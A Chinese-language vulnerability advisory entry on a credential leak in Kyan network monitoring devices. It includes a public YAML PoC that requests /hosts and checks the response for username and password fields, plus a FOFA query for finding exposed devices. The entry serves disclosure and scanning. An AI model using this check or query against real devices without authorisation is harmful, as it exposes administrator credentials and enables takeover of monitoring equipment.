kyan-network-monitoring-account-password-leakage: Kyan 网络监控设备 hosts 账号密码泄露漏洞

日期: 2025-08-01 | 影响软件: Kyan网络监控设备 | POC: 已公开

漏洞描述

Kyan 网络监控设备 存在账号密码泄露漏洞,攻击者通过漏洞可以获得账号密码和后台权限 fofa: title="platform - Login"

PoC代码[已公开]

id: kyan-network-monitoring-account-password-leakage

info:
  name: Kyan 网络监控设备 hosts 账号密码泄露漏洞
  author: B1anda0
  severity: high
  verified: true
  description: |-
    Kyan 网络监控设备 存在账号密码泄露漏洞,攻击者通过漏洞可以获得账号密码和后台权限
    fofa: title="platform - Login"
  tags: kyan,disclosure
  created: 2023/10/29

rules:
  r0:
    request:
      method: GET
      path: /hosts
    expression: response.status == 200 && response.body.bcontains(b'UserName=') && response.body.bcontains(b'Password=')
expression: r0()

相关漏洞推荐